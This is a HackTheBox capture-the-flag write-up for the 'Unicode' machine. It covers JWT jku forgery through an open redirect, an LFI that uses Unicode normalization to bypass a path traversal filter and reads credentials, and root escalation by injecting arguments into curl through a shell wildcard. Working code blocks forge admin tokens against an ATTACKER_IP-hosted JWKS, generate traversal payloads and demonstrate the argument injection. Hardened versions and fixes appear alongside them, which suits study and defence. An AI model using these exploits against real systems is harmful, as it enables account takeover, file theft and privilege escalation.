Unicode - [HTB]

Marmeus

Introduction

Unicode is a medium-difficulty Linux machine from HackTheBox. The attacker has to abuse an open redirect so that a forged JWT passes the server's jku check, gaining access to the dashboard as admin. Next, an LFI vulnerability has to be exploited, using Unicode characters to bypass the path traversal filter, in order to obtain some credentials. Finally, a custom script that can be executed as root has to be exploited through a shell wildcard.

Enumeration

As always, let's start by finding all open ports on the machine with Nmap.

Then we continue with a deeper scan of every open port to get more information about each service.

Looking at port 80, there is a web page where we can register an account.

Hackmedia

Clicking the "Google about us" button redirects us to google.com through an internal redirect page that takes the destination in its url parameter.

Furthermore, once registered we can access the hackmedia dashboard.

Hackmedia dashboard

Analyzing the cookies, we can verify that the platform uses a JWT, which we can decode with jwt.io.

Hackmedia JWT decoded

As we can see, the token is signed with RS256 and carries a jku header, which tells the server where to fetch the key used to verify the signature. Inside the JWKS served at the jku link we can find that public key.

Exploitation 1

Looking for ways to exploit the jku header, there is a post about how to hack JWT tokens with jku. What we are going to do is create our own JWT with the user changed to "admin" and signed with a key we control. To do so, we need a public/private key pair and a JWKS for the jku header, which we can generate with mjwk.

jku generator

However, the jku value is filtered: it has to keep the base URL http://hackmedia.htb/static/. Hence, we keep that prefix and reach the redirect page through it, pointing its url parameter at our own web server, where jwks.json is hosted.

Finally, the JWT and the jwks.json should look like this.

JWT Modified
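The forgery described above, end to end, as an added example that is not code from the post, from mjwk or from the box: a small pure-standard-library RSA implementation stands in for the key generator, make_jwks() produces the jwks.json to host, forge_jwt() signs a token whose jku points through the redirect, and server_verify() models the server's check as the post describes it (a prefix check on jku, then blind trust in whatever JWKS the URL serves). The redirect path, the attacker host, the claim name "user" and the 1024-bit key size are assumptions for the demo.

```python
"""Forge an RS256 JWT whose jku header points at an attacker-controlled JWKS.

Added example (not code from the post or from mjwk). The RSA routines are a
toy implementation so the script runs offline; the key size is demo-only.
"""
import base64
import hashlib
import json
import random

# Placeholder jku: the prefix is from the post; REDIRECT_ENDPOINT and
# ATTACKER_IP are assumptions, replace them with the real redirect path/host.
JKU = "http://hackmedia.htb/static/REDIRECT_ENDPOINT?url=http://ATTACKER_IP/jwks.json"
TRUSTED_PREFIX = "http://hackmedia.htb/static/"
SHA256_DIGESTINFO = bytes.fromhex("3031300d060960864801650304020105000420")


def is_probable_prime(n, rounds=24):
    """Miller-Rabin probabilistic primality test."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37):
        if n % p == 0:
            return n == p
    d, r = n - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def generate_rsa(bits=1024, e=65537):
    """Return a toy RSA key {n, e, d}; random() is not a CSPRNG, demo only."""
    def prime(b):
        while True:
            c = random.getrandbits(b) | (1 << (b - 1)) | 1
            if is_probable_prime(c):
                return c
    while True:
        p, q = prime(bits // 2), prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:   # e is prime, so this means gcd(e, phi) == 1
            return {"n": p * q, "e": e, "d": pow(e, -1, phi)}


def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s):
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def pkcs1v15_encode(msg, k):
    """EMSA-PKCS1-v1_5 encoding of SHA-256(msg) for a k-byte modulus."""
    t = SHA256_DIGESTINFO + hashlib.sha256(msg).digest()
    return b"\x00\x01" + b"\xff" * (k - len(t) - 3) + b"\x00" + t


def rs256_sign(msg, key):
    k = (key["n"].bit_length() + 7) // 8
    m = int.from_bytes(pkcs1v15_encode(msg, k), "big")
    return pow(m, key["d"], key["n"]).to_bytes(k, "big")


def rs256_verify(msg, sig, n, e):
    k = (n.bit_length() + 7) // 8
    if len(sig) != k:
        return False
    em = pow(int.from_bytes(sig, "big"), e, n).to_bytes(k, "big")
    return em == pkcs1v15_encode(msg, k)


def make_jwks(key, kid="hackmedia"):
    """The jwks.json to host on ATTACKER_IP (same shape mjwk produces)."""
    enc = lambda i: b64url(i.to_bytes((i.bit_length() + 7) // 8, "big"))
    return {"keys": [{"kty": "RSA", "use": "sig", "alg": "RS256", "kid": kid,
                      "n": enc(key["n"]), "e": enc(key["e"])}]}


def forge_jwt(payload, key, jku=JKU, kid="hackmedia"):
    header = {"alg": "RS256", "typ": "JWT", "kid": kid, "jku": jku}
    dump = lambda o: b64url(json.dumps(o, separators=(",", ":")).encode())
    signing_input = dump(header) + "." + dump(payload)
    return signing_input + "." + b64url(rs256_sign(signing_input.encode(), key))


def server_verify(token, fetch_jwks):
    """Vulnerable verifier: prefix-checks jku, then trusts the fetched key."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if not header.get("jku", "").startswith(TRUSTED_PREFIX):
        raise ValueError("jku rejected")          # the filter the post runs into
    jwk = fetch_jwks(header["jku"])["keys"][0]    # follows the open redirect
    n = int.from_bytes(b64url_decode(jwk["n"]), "big")
    e = int.from_bytes(b64url_decode(jwk["e"]), "big")
    if not rs256_verify((h + "." + p).encode(), b64url_decode(s), n, e):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(p))


if __name__ == "__main__":
    key = generate_rsa()
    jwks = make_jwks(key)
    token = forge_jwt({"user": "admin"}, key)     # claim name "user" is assumed
    print(json.dumps(jwks))                        # save as jwks.json on ATTACKER_IP
    print(token)
    # Simulate the redirect landing on our host, as the server's fetch would.
    print(server_verify(token, lambda url: jwks))
```

The prefix check is what makes the redirect useful: the string starts with the trusted base, yet the fetch ends at a host we control. A safe verifier pins the JWKS location (or the key itself) in configuration instead of reading it from the token.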

Exploitation 2

With the modified token we have access to the admin dashboard, where we can open the "Saved reports" section.

Admin dashboard

Inspecting the URL, the endpoint takes a file name as a parameter, so it may be vulnerable to LFI.

However, if we try the usual path traversal payloads, a filter catches them and we obtain the following output.

Because the machine is named "Unicode", we may be able to get past this filter with Unicode characters that the server normalizes into the filtered ASCII ones only after the check has run. This post explains how.

The URL-encoded version looks like this.
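The normalization bypass above, as an added example that is not the box's code: vulnerable_resolve() models the filter as the post describes it (reject "../" on the raw name, normalize afterwards), payload() builds the URL-encoded traversal from U+2025 TWO DOT LEADER, which NFKC folds to "..", and hardened_resolve() normalizes first and then confines the result to the reports directory. The reports directory path and the exact filter logic are assumptions.

```python
"""Unicode normalization bypass of a "../" path traversal filter.

Added example, not the application's source. The filter order is the bug:
the check runs on the raw name, the normalization runs after it.
"""
import posixpath
import unicodedata
from urllib.parse import quote, unquote

REPORTS_DIR = "/var/www/reports"   # assumed location of the saved reports

# Compatibility characters that NFKC folds into plain ASCII. The UTF-8 form
# of U+2025 is the %E2%80%A5 you see in the encoded payload.
TWO_DOT_LEADER = "\u2025"          # NFKC -> ".."
FULLWIDTH_SOLIDUS = "\uff0f"       # NFKC -> "/"


def vulnerable_resolve(raw):
    """Filter on the raw name, normalize afterwards."""
    name = unquote(raw)
    if "../" in name or name.startswith("/"):
        raise ValueError("traversal detected")
    name = unicodedata.normalize("NFKC", name)   # U+2025 becomes ".." only now
    return posixpath.normpath(posixpath.join(REPORTS_DIR, name))


def hardened_resolve(raw):
    """Normalize first, then check the resolved path stays under REPORTS_DIR."""
    name = unicodedata.normalize("NFKC", unquote(raw))
    path = posixpath.normpath(posixpath.join(REPORTS_DIR, name))
    if path != REPORTS_DIR and not path.startswith(REPORTS_DIR + "/"):
        raise ValueError("traversal detected")
    return path


def payload(target, depth=4, dots=TWO_DOT_LEADER):
    """URL-encoded traversal that survives the naive filter.

    target is an absolute path such as "/etc/passwd"; depth is the number of
    directory levels to climb (more than needed is harmless, normpath
    collapses the extra ones at "/").
    """
    return quote("/".join([dots] * depth) + target)


if __name__ == "__main__":
    p = payload("/etc/passwd")
    print(p)                                     # %E2%80%A5/%E2%80%A5/...
    print(vulnerable_resolve(p))                 # /etc/passwd
    try:
        hardened_resolve(p)
    except ValueError as err:
        print("hardened:", err)
```

Whether a given character folds to "." or "/" depends on the normalization form the server applies (NFKC here); NFC leaves compatibility characters alone, so the same payload against an NFC-only application fails. The fix is not a bigger blocklist but doing the check on the final, normalized and resolved path.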

Now, reading the nginx default configuration through the LFI, there is a hint about a file with stored credentials.

Those credentials can be read through this link.

Finally, with the database credentials we can gain access to the machine as the user code.

Privilege Escalation

The user code can execute /usr/bin/treport as root.

This binary uses the curl command to retrieve online reports, taking a URL as a parameter. The URL is handed to a shell without quoting, so we can pass a wildcard ("*"): the shell expands it and every file name in the current directory becomes an extra argument to the curl command. There is also a filter on the URL, since file:///root/root.txt is rejected.

The filter is case-sensitive, so File:///root/root.txt gets through and we obtain a new error: the directory where the report is to be stored does not exist. This is where the wildcard comes in.

curl has a --create-dirs option that creates every directory needed to store the output file. Hence, if we create files named "--create-dirs" and "127.0.0.1" in the working directory and pass the wildcard, those names are injected as arguments, the command runs correctly and we can retrieve the root flag.

These are the steps you should follow.

Note: This is the unintended way to solve the machine, so this vulnerability may be fixed once the machine is retired. The intended way is to pass {-K,/root/root.txt} as the URL. This is not a Python dictionary but a shell brace expansion: the same shell that expands the wildcard turns it into -K /root/root.txt, so curl loads the flag as its configuration file and, unable to parse its content as an option, echoes the offending line in its warning.
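The argument injection behind both routes, as an added example that is not treport's source (the exact command it runs is not on the page): vulnerable_download() models a script that builds "curl $url -o ..." and hands it to a shell unquoted, safe_download() is the quoted form, and with_planted_files() drops the two file names from the post into a scratch directory before running either. A shell function named curl shadows the real binary and only prints its argv, so nothing touches the network, and the output path is an assumed one.

```shell
#!/bin/sh
# Wildcard argument injection against a script that runs `curl $url` through
# a shell. Added example, not treport's source. The curl stub below prints
# one <arg> per argv entry so the expansion is visible; the -o path is assumed.
export LC_ALL=C                  # deterministic glob ordering for the demo

curl() { printf '<%s>' "$@"; }   # stub standing in for /usr/bin/curl

vulnerable_download() {          # models os.system("curl " + url + " -o ...")
    url=$1
    curl $url -o /tmp/reports/missing/out.txt   # unquoted: the shell expands * here
}

safe_download() {                # quoted and after --: never expanded, never an option
    url=$1
    curl -- "$url" -o /tmp/reports/missing/out.txt
}

# Run "$@" inside a scratch directory holding the two planted file names.
with_planted_files() {
    dir=$(mktemp -d) || return 1
    ( cd "$dir" && touch -- '--create-dirs' '127.0.0.1' && "$@" )
    rc=$?
    rm -rf "$dir"
    return $rc
}

if [ "${1:-}" = demo ]; then
    with_planted_files vulnerable_download '*'; echo   # planted names become curl options
    with_planted_files safe_download '*'; echo         # the literal * is one argument
fi
```

Run with `sh script.sh demo`. The first line shows --create-dirs arriving as a real curl option, which is exactly what makes the missing report directory stop being an error on the box. The intended {-K,/root/root.txt} payload rides the same unquoted call: a shell with brace expansion rewrites it to -K /root/root.txt before curl ever sees it. The fix on the script side is to pass the URL as a single list element to subprocess, or at least to quote it and put it after --.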